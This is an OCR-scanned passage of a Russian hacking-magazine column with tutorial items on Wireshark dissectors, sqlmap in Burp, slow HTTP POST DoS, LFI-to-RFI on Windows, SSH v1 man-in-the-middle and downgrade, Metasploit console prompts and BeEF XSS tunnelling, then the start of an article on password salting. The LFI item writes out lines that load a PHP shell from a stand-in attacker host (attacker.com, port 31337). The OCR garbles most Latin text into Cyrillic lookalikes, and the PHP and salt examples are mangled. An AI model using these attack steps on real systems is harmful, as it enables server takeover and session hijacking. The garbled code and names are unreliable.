информацию по опциям всех утилит, идущих вместе с ВІаіе- 
ВІоддег, ты можешь посмотреть на официальном сайте. 



УШИ 

• Отличный 
онлайн-редактор, 
позволяющий 
сохранять 
документы в йгор- 
Ьох и импортировать 
из него: сІіІІіпдег.іо: 

• расширение для 
боодіе СЬготе, Ріге- 
іох и ТИипсІегЬігсі, 
позволяющее писать 
письма, используя 
Магксіоѵѵп-разметку: 
ЫЫу^уу2рУ1 . 
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ВЗЛОМ/ ЕА5ѴНАСК 



Алексей «бгеепйод» Тюрин, ОідііаІ Бесигііу (іѵѵіНег.сот/апІуигіп) 




ИЗМЕНЕНИЕ ПАРСЕРА В ѴѴІВЕ5НАКК 




ѴѴАКЫШ6 



Вся информация 
предоставлена 
исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут 
ответственности 
за любой возможный 
вред, причиненный 
материалами данной 
статьи. 



ЗАДАЧА 



РЕШЕНИЕ 

ѴѴігезЬагк — анализатор протоколов (или сниффер). Прекрасная тул- 
за, во многом незаменимая. Она не случайно входит в десятку самых 
необходимых хак-софтин. Конечно, ее главным плюсом являются раз- 
нообразнейшие диссекторы, то есть «парсеры» тех или иных протоко- 
лов, которые ѴѴігезЬагк «интеллектуально» применяет в зависимости 
от протоколов, портов и прочего. Но если с низкими протоколами (ІР, 

ТСР, АРР, ЕіЬегпеі] чаще всего все достаточно просто, то с верхними, 
уровня приложений, частенько возникаюттрудности. Особенно когда 
используются нестандартные связки (инкапсуляция) протоколов или 
нестандартные порты. На самом деле это небольшая проблема. Хотя 
некоторые и не в курсе, но ѴѴігезЬагк позволяет четко указывать, 
какой уровень и каким диссектором парсить. Все, что требуется, — 
выделить «странный» пакет по правой кнопке, выбрать «йесосіе аз...» 
и указать необходимый протокол. В качестве практического примера 
могу отправить к разбору процедуры аутентификации клиентом на М5 
501 сервере без включенного обязательного шифрования трафика. Выбираем необходимый диссектор для конкретного порта 
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ПРИКРУТИТЬ 50І.МАР К ВІЖР 5ШТЕ 



ЗАДАЧА 



РЕШЕНИЕ 

Данный пост трудно назвать задачей, скорее это некая приятность 
для пентестера, которой я и хочу поделиться. 

Ползая между различными проксиками типа ѴѴеЬзсагаЬ, 2АР, 
Вигр и так далее, я в итоге (или пока что) остановился именно на 
Вигр'е. Имхо, ѴѴеЬзсагаЬ подводит количество багов и отсутствие 
новых версий, а 2АР — некая недоразвитость... В то же время 
такая тулза, как зрітар, которая используется для продвинутой 
раскрутки 5С11_-инъекций, тоже очень хороша и местами прият- 
но выделяется на фоне конкурентов. Хотя с ней есть некоторые 
трудности. Аименно — с увеличением функционала количество 
консольных параметров разрослось до неадекватного :). То есть 
без 5Ш с ней работать не очень удобно. Хотя надо отметить, что 
пучок сторонних гуев к ней имеется. Но дело не в этом. Чисто по- 
человечески приятно, когда у тебя «все под рукой» и когда работа 
по возможности автоматизирована. И похоже, не я один так думаю. 



Как и у собратьев Вигр'а, у него самого есть система добав- 
ления дополнительных плагинов, что иногда очень выручает (но 
об этом лучше написать отдельную статью). Так, добрый пенте- 
стер под ником сгОЬп взял и реализовал аддон к Вигр'у — 5111- 
прослойку для зрітар. Теперь, прикрутив плагин, мы должны 
всего лишь выбрать необходимый ІІРІ_, кликнуть правой кнопкой 
и отправить его в гуишку. А далее уже работать с зрітар через 
этот гуи. В качестве дополнительного бонуса гуя сейчас имеется 
поиск по выводу и его экспорт в файл (то есть лучше обыкновен- 
ной виндовой консоли). 

С точки зрения прикрутки плагина, все, что нам требуется, — 
выполнить следующие действия: 

1. Скачать плагин с доо.діЛМ9М . 

2. Разархивировать его в папку к Вигр'у. 

3. ИзменитьзиіІе.ЬаІ на: 

З'аѵа -с!аззра1:1і Ьигрзиі1:е_патео'аг;р1и§іп_патео’аг Ьигр.З'ЬагІіВигр 
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ПРОВЕРИТЬ УСТОЙЧИВОСТЬ ВЕБ-СЕРВЕРА К 5ЮѴѴ Р05Т 



ЗАДАЧА 



РЕШЕНИЕ 

В прошлый раз мы начали разбирать классические и не очень 
классические йоЗ-атаки на веб-серверы. Сегодня продолжим, 
поэтому я опускаю вводную часть. 

Итак, позвольте рассказать про атаку зіоѵѵ НТТР Р05Т йоЗ. 
Название ее определенно говорящее. Идея атаки в том, чтобы 
уложить НТТР-сервер за счет использования «медленных» Р05Т- 
запросов на сервер. Так, в заголовке РОЗТ-запроса клиент пере- 
дает серверу СопІепМепдіЬ большого значения, а после удачного 
запроса начинает очень медленно передавать данные. Веб-сервер 
получаеттакой РОЗТ-запрос, видит в нем СопІепМепдіЬ и ждет 
соответствующее значение данных в теле запроса, но, как я уже 
сказал, данные приходят к нему медленно, по чуть-чуть. 

Таким образом, атакующий, имея под своим контролем неболь- 
шое количество хостов (возможно, даже один), может создавать 
такие «висящие коннекты» и израсходовать ресурсы сервера, так 
что тот не сможет отвечать легитимным клиентам. Исчерпавшиеся 
ресурсы могут быть различны. Например, можно занять все потоки 
или занять ими всю память. 
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Заголовок отправлен, данные (ріѵ...) передаются. 
Повторяем много раз = сайт в дауне :) 
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Настройка тулзы от 0ѴѴА5Р для тестирования 



Как видно, данная атака основывается на «уязвимостях» само- 
го протокола НТТР. Ведь мы не вылезаем за рамки протокола, а 
эмулируем множественное подключение медленных клиентов. То 
есть с точки зрения логов, если все настроить правильно, жертва 
может долго не догадываться о причинах падения ее сервака. 

Такая «нормальность» атаки рождает достаточно неприятную про- 
блему — от нее непросто защититься. 

Если посмотреть более общим взглядом, то можно заметить, 
что данная атака во многом похожа на описанный в прошлом 
номере ЗІоѵѵІогіз. Да и вообще вспоминаются разнообразные 
олдскульные атаки, типа 5ѴІ\ИІоосГа, — история повторяется на 
новом уровне. Но даже с учетом большого сходства ЗІоѵѵІогіз и 
Зіоѵѵ РОЗТ'а они достаточно различны с точки зрения атакующего 
потенциала. Как минимум если, используя ЗІоѵѵІогіз, можно за- 
валить в основном АрасЬе-подобные веб-серверы, то зіоѵѵ РОЗТ'у 
подвержены почти все основные серверы. Это и тот же АрасЬе, и 
все версии 115, и что-то альтернативное вроде ІідШрсІ. Что касается 
пдіпх, то ситуация с ним не совсем ясна. Чисто теоретически он не 
должен быть подвержен такой атаке, но фактически, с учетом тех 
или иных настроек его самого и ОС, на которой он крутится, иногда 
получается его завалить. 

Что еще «страшно», — как и ЗІоѵѵІогіз, реализовать атаку не 
составляет труда, используя любой скриптовый язык... Но из- 
вращаться нам ни к чему, так что отправляемся за официальной 
тулзой от 0ѴѴА5Р — доо.дІ/ІУРтВ . 



РАСКРУТИТЬ І_РІ ДО КРІ ПОД ОС ѴШБОѴѴБ 



ЗАДАЧА 



РЕШЕНИЕ 

І_РІ (І_осаІ Рііе ІпсЫе) — одна из очень распространенных веб- 
уязвимостей. Суть ее в том, что при некорректной фильтрации 
ввода или ее отсутствии (либо какой-нибудь логической дыре) мы 
имеем возможность подгрузить произвольный скрипт, который 
исполнится на веб-сервере. 

Простейший пример скрипта на РНР будет выглядеть следую- 
щим образом: 

<?рІір 



іпсіисіе $6ЕТ[ г й1е* ] ; 

...?> 



Таким образом, если мы передадим такому скрипту в параме- 
тре ПІе имя какого-то еще РНР-скрипта, то РНР при его испол- 
нении попытается подгрузить скрипт из параметра и исполнить 
его. Хорошо, но нам, как атакующим, ведь интересно не просто 
что-то подгрузить из функционала веб-приложения, нам ведь 
нужен шелл. И здесь у нас возникает желание подгрузить скрипт 
с нашим контентом. Как это сделать? Способов есть несколько. 
Конечно, самый простой — расположить наш РНР-шелл на каком- 
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ни будь еще веб-сервере и указать полный путь до файла в виде: 
ІтЕір : //аНаскег . сот/5Ііе11 . рЬр 

Но данный способ срабатывает нечасто, так как в конфигах РНР 
есть опция, запрещающая подгрузку удаленных файлов. Казалось 
бы, все, здесь нас больше ничего хорошего не ждет и надо искать 
другие, локальные пути. Да ведь запреты запретами и теория тео- 
рией, а в жизни у нас есть топор в рукаве :). 

Вообще, мне лично очень интересны кросстехнологичные баги- 
фичи. Об одной из них мне недавно рассказал Алексей Синцов 
(вот ведь, на все руки мастер :)), чем меня очень порадовал. Фича 
оказалась достаточно простой, но позволяющей обойти упомяну- 
тый запрет на загрузку файлов с удаленных хостов. 

Все, что требуется для обхода ограничения, — это, во-первых, 
чтобы веб-сервер с РНР был запущен под ѴѴіпсІоѵѵз, а во-вторых, 
указать путь до нашего файла в виде: 

\\а1:1:аскег . сот\5Ііе11 . ріір 

То есть как будто до виндовой шары. Как ни странно, данный спо- 
соб работает. И похоже, потому, что схема подключения здесь не 
указывается. На всякий случай еще раз отмечу, что данный способ 
сработает, только если ОС — винда, так как только в ней действует 
данное «сокращение» на уровне АРІ. 

Но и это еще не все. Очень часто веб-серверы находятся за 
файрволами, а потому обратиться напрямую по шаре через ин- 
тернет к веб-серверу нам вряд ли удастся. Но интересно, что мы 



можем указать порт, по которому он к нам будет коннектиться: 
\\а1:1:аскег.сот:31337\5Ііе11.рІір 

Таким образом, мы можем пробрутить порты и найти, какой из 
них разрешен. Здесь важно отметить, что если указан порт, отлич- 
ный от стандартного, то подключение уже будет происходить не по 
5МВ, а по ѴѴеЬйАѴ. 

Итак, мы имеем такую последовательность действий: 

1. Понять, чтоОС — ѴѴіпсІоѵѵз. 

2 . Поснифать на аМаскег.сот трафик и, брутя порты, 
понять, где есть«дырка». 

3. Поднять на данном порту анонимный ѴѴеЬйАѴ или шару. 

4. Выложить на нее шелл и подгрузитьего. 

5 . Радоваться. 



И ВОЗНИКАЕТ ЖЕЛАНИЕ 
ПОДГРУЗИТЬ СКРИПТ С 
НАШИМ КОНТЕНТОМ. КАК ЭТО 
СДЕЛАТЬ? СПОСОБОВ ЕСТЬ 
НЕСКОЛЬКО. 



ПОЛУЧИТЬ ЛОГИН И ПАРОЛЬ ОТ 55Н 



ЗАДАЧА 



РЕШЕНИЕ 

55Н — один из основных протоколов для удаленного защищенного 
взаимодействия в Сети, является одним из главных админских 
интерфейсов. И если атаки на другие интерфейсы (ѴѴеЬ, 551, РйР) 
мы уже разбирали в Базу Наск, то 55Н почему-то обошли стороной. 
Что ж, исправляемся. 

Итак, давай представим простую ситуацию: есть сетка, есть 
админ, есть сервер с открытым 55Н, которым активно пользуется 
админ для удаленного администрирования. Нам же необходимо 
получить доступ к данному серваку. И как же это сделать? Ответ: 
сейчас чаще всего — никак :). Ну, в смысле не совсем никак, но 
точно не через 55Н. Здесь слабое звено стоит искать либо в других 
сервисах сервера, либо в самом админе... Причины — высокая за- 
щищенность последней версии 55Н на уровне протокола и малое 
количество эксплойтов под ПО... Хотя я, наверное, перегибаю 
палку, говоря «никак». Все же пути есть. 

Конечно, первое, что приходит на ум, — ЬшЫогсе. Тогда ТНС 
Нусіга нам в руки и в бой! Но возможно, это и не потребуется, если 
нам повезет. А наше везение во многом зависит оттого, насколько 
стар атакуемый сервер. 

Наш шанс в том, что он будет поддерживать 55Н версии 1. Эта 
версия протокола 55Н имеет серьезную проблему, которая позво- 
ляет нам, атакующим, провести классическую тап-іп-іЬе-тіббІе 
атаку и в итоге видеть незашифрованный трафик. 

В общем виде атака представляет собой следующий процесс: 

1. Мы проводим АРР-спуфингмеждуадмином и сервером и таким 
образом контролируем передаваемыйтрафик. 

2 . Админ коннектится на сервер по55Н. 

3. Серверотправляетсвой открытый ключ клиенту. 

4 . Мы подменяемэтотключикнасвой. 

5 . Клиент55Н админа выбирает шифрование, генеритсессионный 
ключ, шифрует его открытым ключом сервера и отправляет его. 




Серверов, поддерживающих Б5Н версии 1, еще много 

6. Так как клиент за шифровал сессионный ключ нашим открытым 
ключом, то мы его расшифровываем и передаем дальше серверу. 

7 . Зашифрованное соединение на основе сессионного ключа 
установлено. Номы знаем этот ключ, а потому можем расшифро- 
вывать проходящий через нас трафик. 

Этот процесс и показан на рисунке. Фактически данную атаку 
можно реализовать с помощью ЕКегсар или Саіп. 

Теперь же самое важное — как много осталось серверов, 
которые поддерживают 55Н ѵі? Точно я не скажу, но во время про- 
ведения пентестов они систематически попадаются. Сама атака 
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Подключение к 5БН-1.99 и поББНѵІ, и поѵ2 




Схемка МІТМ для 55Н версии 1 

стала общеизвестна году так в 2000-2001 -м. А потому почти все 
новые серваки и железки поставляются уже с правильной версией 
55Н. Но в то же время всякое пятилетнее оборудование может быть 
уязвимо. Особенно это относится к сетевому оборудованию и все- 



возможным нестандартным железкам (например, контроллерам), 
безопасностью которых производители плохо занимаются. Как 
практический пример — посмотри на збосІапЬд.сот . 

Но и это еще не всё. На самом деле не все и не сразу перешли 
на 55Н ѵ2, был и переходный период, когда серверы для обратной 
совместимости поддерживали и первую, и вторую версии 55Н. 

И таких серверов тоже есть пучок, и их мы тоже можем атаковать. 
Здесь нам поможет 55Н йоѵѵпдгасіе атака. 

Чтобы все сразу стало ясно, следует сказать о том, как сервер 
показывает, какие версии 55Н он поддерживает. Все очень про- 
сто. При подключении по 55Н сервер открытым текстом отвечает 
клиенту одним из трех видов сообщений: 

• 55Н-1.5 — поддерживается только 55Н версии 1; 

• 55Н-1.99 — поддерживаются 55Н версии и 1, и 2; 

• 55Н-2.0 — только версия 2. 

То есть, просто подключившись к серверу, мы можем понять, 
насколько он уязвим. Принцип работы 55Н йоѵѵпдгасіе, я думаю, те- 
перь понятен: когда клиент коннектится к серверу, мы подменяем 
ответ от сервера (опять же используя МІТМ) с текста «55Н-1.99» на 
«55Н-1.5». Клиент думает, что сервер поддерживает только 55Нѵ1, 
и подключается, используя его. 

Конечно, здесь еще многое зависит и от настроек клиентского 
ПО. Но, например, тот же де-факто стандартный виндовый 55Н- 
клиент РиТТѴ поддерживает 55Н версии и 2, и 1 (см. скриншот). 
Практическую реализацию показывать не буду, так как Саіп, на- 
пример, проводит эту атаку на автомате (боѵѵпдгасіе + раза зпіІТ = 
АРР-55Н-1), когда используется АРР-спуфинг. Если же есть жела- 
ние самому потренироваться, то вот линк — оо.д1/тдд2У . 



НАСТРОИТЬ ПОД СЕБЯ МЕТА5РШТ РВАМЕѴѴОВК С0Ы50І.Е 



ЗАДАЧА 



РЕШЕНИЕ 

Меіазріоіі Ргатеѵѵогк стал одним из главных пентестер- 
ских инструментов. Оно и понятно: в него портируется много 
сторонних тулз, паблик эксплойты постоянно добавляются, 
расширяется функционал — то есть проект постоянно растет 
и развивается. 

Несмотря на то что у М5Р есть несколько видов 31)1, очень мно- 
гие все равно пользуются его консольной версией — тзкопзоіе. 
Нетакдавноя обнаружил, что его можно настроить под себя и 
сделать информативней. 

Например, при запуске тзіюопзоіе мы видим приглашение 
«тз(>», которое не очень-то полезно. Но оказывается, все 
можно изменить. В тзкопзоіе есть параметр, который отвечает 
за то, что будет отображаться. И имя ему — РРОМРТ. Установка 
значения переменной осуществляется стандартными команда- 
ми: «зеі» — настройка будет применена в рамках данной сессии, 
«зеід» — настройка «навсегда», то есть сохранится в пользова- 
тельском конфиге. 

Например, следующей командой мы указываем выводить ІР- 
адрес в начале каждой команды (что очень удобно, так как сразу 
понятно, что выводить в І.Н05Т для модулей): 

зеі: РКОМРТ %1 

В итоге мы получим примерно следующее: 

192. 168.0. 1> 

Кроме %І_, которая ответственна за вывод локального ІР- 
адреса машины, есть еще и другие. Далее полный список: 



%й — путь локальной директории; 

%Н — Ьозіпате атакующего; 

— количество запущенных модулей ЦоЬ); 

%І_ — ІР-адрес атакующего; 

%5 — количество имеющихся сессий; 

%Т — Іітезіатр; 

%ІІ — имя пользователя, запустившего тзТ 

Кроме того, есть еще дополнительные фичи. Во-первых, для %Т 
можно указывать формат временных меток, используя еще одну 
переменную — РготрГПтеРогтаІ, с указанием параметров (%сІ — 
день, %т — месяц, %у — год и так далее). Во-вторых, для удобства 
имеется возможность использовать цвета — их достаточно много, 
и именуются они по первым трем буквам названия на английском: 
%уеІ — желтый, %гесІ — красный и так далее. Ну и кроме того, все, 
что начинается не с %, будет отображаться как текст. 

Таким образом, мне кажется, удобная консоль будет иметь на- 
стройку (также см. скриншот): 

веі: РКОМРТ %І_ %гесІ5 :%5 □ :%□ 



ІИ5*> 56* РВОМРТ ^1_ %ГйСІ 5:%5 1:^.] 
РКОМРТ => %І_ 

192 , 168 , 79.128 >| 



Локальный ІР, количество сессий и іоЬз'ов 
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ВЗЛОМ/ ЕА5ѴНАСК 



ОРГАНИЗОВАТЬ ТУННЕЛЬ ЧЕРЕЗ Х55 



ЗАДАЧА 



РЕШЕНИЕ 

Итак, опять представим себе ситуацию. Есть сервер с админи- 
стративным веб-интерфейсом, есть админ и есть мы, а хотим мы 
поовнить данный сервачок. Предположим, что каких-то сверхкри- 
тичных уязвимостей на вебе найдено не было, а только, скажем, 
Х55'ка. И вроде бы все отлично: хватай Х55'кой куки, и вперед! Но 
как бы не так. Как минимум, проблемой может стать установлен- 
ный сервером для кукисов флаг НТТРОпІу, который не даст нам 
возможность вынуть их из браузера админа. Другой проблемой 
может стать фильтрация по ІР доступа к веб-серверу или к самой 
админке. И что же тогда делать? Организовать туннель через Х55. 
Что бы там ни говорилось о продвинутом использовании Х55'ок, но 
самым мощным рауІоасГом, я думаю, является как раз Х55-туннель. 
Зачем нам аутентификационные куки, когда мы можем напрямую 
выполнять какие-то действия на сайте от имени нашей жертвы? 

Но постой. Давай посмотрим, что же такое Х55-туннелинг. Если 
говорить в общем, то это специальный 6аѵа5сгірІ, который подгружа- 
ется Х55'кой нашей жертве. Далее этот 65 открывает какую-нибудь 
страницу на атакуемом сайте и полностью ее нам пересылает. Мы ви- 
дим ее в своем браузере, кликаем, куда нужно, но наши действия не 
выполняются браузером, а передаются обратно в этот 65, который и 
произведет необходимые действия на атакуемом сайте, но от имени 
жертвы. Причем жертва об этом не будет догадываться. 

Описание, конечно, очень общее, для понимания идеи. На прак- 
тике все происходит несколько сложнее, количество элементов 
несколько больше, и это мы сейчас рассмотрим на примере ВеЕР. 

ВеЕР — это специальный фреймворк для проведения мощных 
и глубоких атак на браузеры с использованием Х55'ок. На самом 
деле, может быть, не очень хорошо получается, что описывать 
такую прекрасную вещь, как ВеЕР, мне приходится в несколько 
строк, ведь она заслуживает отдельной статьи. Но я думаю, что в 
следующих выпусках мы это поправим. 

Итак, ВеЕР представляет собой трехкомпонентную систему: 

1. Браузерыжертв — бооскеб Ьгоѵѵзегз. Браузеры, в которые нам 
удалось подгрузить свой, а точнее ВеЕР'а, 6аѵа5сгірІ-код. 

2 . Ядро ВеЕР'а — главное связующее и всеобрабатывающее звено. 

3. Интерфейс ВеЕР'а, к которому атакующий подключается, ис- 
пользуя свой браузер, и через который он может«управлять» 
жертвами. На самом деле не совсем управлять, а скорее за пу- 
скатьтеили иные атакующие модули. 

Если посмотреть на это в процессе, то атакующий с помощью 
Х55'ок или просто заманив жертву себе на сайт, подгружает ей 
в браузер 65 ВеЕР'а. Данный 65 «устанавливает соединение» 




с ядром фреймворка и ждет от него команд (систематически 
стучится). Атакующий через интерфейс может указать действие 
для какого-нибудь из браузеров жертв, выполнить сканирование 
портов например. Ядро, получив от атакующего команду, пере- 
правит к жертве еще дополнительный кусок 65, который исполнит 
указанную команду (то есть сканирование портов), а результат 
отправится обратно в ядро. Кроме сканирования портов, можно 
в любой момент подгрузить какой-нибудь эксплойт, например, и 
захватить контроль над тачкой. На самом деле это очень мощная 
штука. Получается, что люди как бы садятся на крючок... 

Но вернемся ктуннелю. Одним из атакующих модулей ВеЕР'а 
является ТиппеІ Ргоху (ака Х55-туннель). 

Для того чтобы сделать Х55-туннель, нам потребуется прописать 
в нашем браузере специальный прокси-сервер от ВеЕР'а (по умол- 
чанию 127.0.0.1, порт 6789). После этого все клики в нашем браузере 
(то есть НТТР-запросы) будут обрабатываться этим прокси. Данный 
прокси, получая запрос от атакующего, модифицирует его специ- 
альным образом и переправляет 65 модулю ВеЕР'а в браузере 
жертвы. Этот модуль выполняет запрос на атакуемый сервер, но от 
имени заХ55'енной жертвы. Результаты запроса (НТМЬстраничка) 
получаются этим 65-модулем ВеЕР'а и переправляются обратно 
в ядро ВеЕР'а. Оттуда данные конвертируются и передаются на 
ВеЕР-прокси, который, в свою очередь, отображает страницу для 
браузера атакующего. То есть фактически атакующий видитто, что 
«видит» жертва. Далее атакующий может выполнить еще какое-то 
действие, например ввести какую-нибудь форму и отправить ее. 

Все эта операция повторится, 65 ВеЕР'а отправит от имени жертвы 
данный запрос, и результаты его попадут обратно атакующему. 

Думаю, что теперь все стало достаточно понятно. Как видишь, 
это фактически удаленное управление. Теперь о плюсах, минусах 
и тонкостях. Важно помнить о том, что отправляемые 65-модулем 
ВеЕР'а запросы от браузера жертвы на атакуемый веб-сервер (ад- 
минку) будут содержать аутентификационные куки в заголовках, то 
есть атакующий будет иметь аналогичный доступ в админке, что и 
жертва. Во-вторых, большим плюсом здесь является то, что жертва 
не знает о действиях, которые производит атакующий от ее имени. 
Это возможно потому, что мы можем, например, заманить жертву 
к нам на сайт, а на нем в скрытом фрейме открыть сайт-админку и 
через Х55'ку в нем подгрузить 65 от ВеЕР'а. И пока жертва будет на 
нашем сайте, мы можем производить нашу атаку. 

Атака становится еще более опасной, когда мы находим- 
ся в одном сегменте с админом (жертвой) и можем проводить 
МІТМ-атаку (агр-зрооПпд, например). В данном случае мы можем 
вставлять такой скрытый фрейм во все открываемые админом веб- 
страницы (которые передаются по НТТР) и поддерживать атаку 
таким образом до победного конца. 

Из минусов и тонкостей стоит отметить, во-первых, то, что, в от- 
личие от многих других модулей ВеЕР'а, при ТиппеІ Ргоху 65 ВеЕР'а 
должен быть подгружен именно через Х55 на атакуемом сайте. Это 
важно для того, чтобы не нарушать кроссдоменные политики (50Р) 
и иметь возможность выполнять аутентификационные запросы 
и получать на них ответы. А во-вторых, так как у нас есть пере- 
дающее звено (65-модуль ВеЕР'а) и мы работаем не напрямую с 
сервером, то могут возникнуть трудности практического плана — с 
отображением контента или не очень корректной работой с запро- 
сами, когда используются какие-то странные технологии :). 

Опять же, с точки зрения совсем практической, здесь особо 
рассказывать нечего: требуется выбрать жертву, указать модуль 
ТиппеІРгоху и настроить свой браузер на прокси ВеЕР'а. Здесь 
лучше все своими глазами увидеть ( доо.дІ/5сІНВ8) . а еще лучше — 
попробовать своими ручками. 

Вот и все, надеюсь было интересно. Успешных ресерчев и по- 
знаний нового! □С 
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БапіагБаІ5ига (5аІ5ига(сІ1337сІау.сопп, Іѵѵіиег,сот/5апіаг_5аІ5ига] 




о криптостоиких 




УЧИМСЯ НА ЧУЖИХ 
ОШИБКАХ И ЗАЩИЩАЕМ 
ПАРОЛИ ОТ БРУТФОРСА 

Защищенный пароль — это не просто 
длинный набор букв, цифр и символов 
в разных регистрах. Чтобы реквизиты 
пользователей устояли перед банальным 
брутфорсом, разработчикам нужно продумать 
сбалансированную и эффективную систему 
шифрования. Большой компании, чтобы 
понять это, необходимо столкнуться с утечкой 
данных, а тебе достаточно просто прочитать 
статью! 

Последнее время новостная лента пестрит постами об утечках 
паролей с крупных ресурсов. Если ты следишь за новостями мира 
ИБ, то наверняка слышал об утечке 6,46 миллиона хешей паролей 
крупнейшей социальной сети для профессионалов — ЫпкесІІп 
[\ А/ѵѵѵѵ.Ііпкесііп.сот ). По сей день этот инцидент расследуют самые 
крутые спецы ФБР. Можно сказать, что последние полгода орга- 
низация утечек паролей является негласным трендом в кругах 
анонимусов. 

За это время были опубликованы хеши таких популярных 
ресурсов, как БазУт, ѴаЬоо Ѵоісе, еНагтопу, ІМѴЮІА. Небезыз- 
вестная компания РарісІ 7 провела анализ 165 тысяч хешей, слитых 
с ЫпкесІІп, и составила инфографику самых популярных (она при- 
ложена в качестве иллюстрации к этой статье). 

На первый взгляд, пользователи сами виноваты, что используют 
такие простые для восстановления пароли. Но так ли это? В конеч- 
ном счете компании удалось расшифровать и проанализировать все 
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ТОР-ЗО ПАРОЛЕЙ ИЗ УТЕКШЕЙ БАЗЫ иЫКЕОШ 




пароли, как сложные, так и простые. Механизмы защиты паролей, 
фигурировавшие в историях этихутечек, настолько примитивны, 
что при желании для восстановления исходных данных можно 
использовать минимальные ресурсы. Стоит ли в таком случае гово- 
рить о том, насколько уязвимыми мы становимся с неустойчивыми 
хешами, которые легко вскрываются ресурсами китайской ОЕМ- 
видеокарты стоимостью 42 доллара? Возможно ли существенно 
усложнить злоумышленникам восстановление паролей пользова- 
телей с утекшей БД? Возможно! Сегодня я расскажу тебе о том, как 
снизить риски восстановления паролей из неустойчивых хешей. 

АТАКА НА ХЕШИ 

Для того чтобы понять, насколько эффективен метод хеширова- 
ния паролей, давай ознакомимся с существующими способами 
«восстановления» значения, скрывающегося за хешем. Их не так 
много, и я думаю, ты слышал обо всех. 

1. Брутфорс(ВгиНогсе) — различают основные три типа брутфорса: 
• тупой (сіитту) — перебор всех возможных значений. Этот подход 
довольно устарел и в чистом виде уже не применяется нигде; 



• шаблонный (Іетріаіе) — перебор с использованием специаль- 
ных шаблонов гедехр, а также с применением различного рода 
словарей; 

• экстремальный (ехігете) — перебор при помощи средств СРП 
Современные видеокарты, поддерживающиетехнологию СІЮА, 
АМБ ОрепСІ_, позволяют перебирать все возможные комбина- 
ции шестизначных паролей меньше чем за минуту, а семизнач- 
ные — не больше чем за шесть минут. Используя технологии типа 
СговзРіге и Бігеат, можно и вовсе объединять видеокарты в один 
массив для более эффективного перебора. Скорость перебора 
значения приэтом можетбыть рассчитана поформуле: 

Среднее время (Т) перебора (ІдІ) 
на N-N1 количестве видеокарт 

-Ь =__((1лІ)/М1 + N2 + N3 + ... + І\Іп)/2 

2. Перебор по«РаіпЬоѵѵІаЫез» (радужныетаблицы) — посути,это 
тот же перебор, только с использован ием заранее сгенерирован- 
ных специальным образом таблиц. Очень эффективно применять 



ОШИБКА НАЧИНАЮЩИХ КРИПТОАНАЛИТИКОВ 



Многие начинающие криптоаналитики считают, что схема 
5НА1(БНА1(5НА1(..($Иа5Ы))) будет добавлять раунды в БНА1. 

Все было бы именно так, если бы не одно фундаментальное свойство 
алгоритма 5НА1. Из него следует, что вычислительно невозможно 
написать такую функцию 5НА1000, которая будет эквивалентна 



тысячекратному вложенному вызову 5НА1 и при этом будет легко 
вычислима. Обрати внимание, что результат БНА1(БНА1(.Л$Ма5И))) — это 
не то же самое, что добавить больше раундов внутрь 5НА1, так как там 
есть еще пре- и постобработка. Результатом такого хеширования может 
стать невыгодный во всех отношениях расход процессорных ресурсов. 
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против длинных паролей. Скорость перебора ограничивается 
лишьскоростью процессора и быстродействием памяти. 

КАК СНИЗИТЬ РИСКИ? 

Из всего сказанного ты, наверное, должен был понять, насколь- 
ко неустойчивы современные криптографические алгоритмы 
хеширования к современным реалиям атак. Есть несколько путей 
снижения рисков на уровне алгоритмов: 

1. Использование более криптостойких алгоритмов. 

2. Маринование существующиххешей. Под маринованием имеется 
в виду способ искусственного усложнения пароля, называемый 
накладыванием соли. Соль представляет собой набор различно- 
го рода символов, обычно это символы обоих регистров, цифры 

и спецсимволы, которые накладываются на готовуюхеш-сумму 
пароля или склеиваются с ней. 

Основная задача соли — намеренное удлинение пароля, ко- 
торое значительно осложняет восстановление исходных паролей 
с помощью предварительно построенных радужных таблиц. При 
этом надо учитывать, что соль не защищает от полного перебора 
каждого пароля в отдельности! Ниже приведен список наиболее- 
популярных типов солей. 

тсІ5($ра55 .$5а11:) 
тсІ5($5а11:.$ра55) 
тсІ5(тсІ5($ра55) ) 
тсІ5(тгі5(тсІ5($ра55Ш 
ѵВиІІе^іп < ѵЗ.8.5 
тсІ5(тсІ5($5аИ:) .$ра55^ 
тсІ5($5а11: .тсІ5($ра55) ) 
тсІ5($5а11: . $ра55 . $5а11:) 
тсІ5(тсІ5($5а11:) .тсІ5($ра55) ) 
тсІ5(тсІ5($ра55) .тсІ5($5а11= )) 
тсІ5($5а11:.тсІ5($5а11:.$ра55)) 
тсІ5($5а11:.тсІ5($ра55.$5а11:^ 
ѵВиІІеІііп > ѵЗ.8.5 
тсІ5($и5егпате.0.$ра55) 
тсІ5(5І:г1:оиррег(тсІ5($ра55) )) 

5Ііа1($ра55.$5а11:) 

5ба1($5а11:.$ра55) 

5Ііа1(5Ііа1($ра55) ) 

5Иа1(5Ііа1(5Ііа1($ра55^ 

5ба1(5І:г1:о1оыеп($и5еппате) .$ра55) 

Приведем пример простейшей маринованной защи- 
ты с применением статической соли от радужных таблиц 
тб5(5Иа1(тсІ5($ра55))) на РНР: 



$ра5 5могсІ = "равзмсГ; // Введен ный польз ователем п ростой 
пароль, который с вероятностью 99,9% будет в радужной 

таблице типа Іоѵу-аІрНа 

есбо 5Ііа1($ра55ыопсП ; // По понятным причинам мы больше 

не используем алгоритм тсІБ для хеширования ;-) 

$ва1і = "5$4( !@#$% Л 17ВВ56Ш1_52" ; // И спользуя случа й- 

ный набор символов, мы можем изменить значение хеша 
есііо зИаИЗзаИ: . $ра55ыогсП ; // А вот хеш для маринован- 
н ого пар оля с солью 

// Такая комбинация пароля и его хеша не найдется ни 

в одной радужной таблице 

Статическая соль и подобные конструкции могут служить 
достаточно хорошо до тех пор, пока структура этих конструкций 
и соль хранятся в тайне. Если же злоумышленник сможет раз- 
реверсить алгоритм и узнать зашитый статический (что важно!) 
секретный ключ хеширования, то уже понятно, что ему не составит 
труда модифицировать под себя свою «радужную таблицу». 

Так как полагаться на систему защиты сервера нельзя, нужно 
искать другой вариант. Более удачным вариантом может стать гене- 
рация уникальной соли для каждого юзера на основе его идентифи- 
катора, который закрепляется за ним после регистрации на ресурсе: 

$Ііа5Іі^ 5Ііа1($и5ег_ісІ . $ра5 5могсІ); 

Идеальный вариант — генерировать полностью уникальную соль: 

// Генерируем случайную строку длиной в 22 символа 

■РипсЕіоп ипідие_5а11:() { 

5иЬз1:г(5Ііа1(т1:_гапсІ( ) ) 3 <д 3 22) ; 

} 



$ипідие_5а11: = ипідиез аІІгО ; 

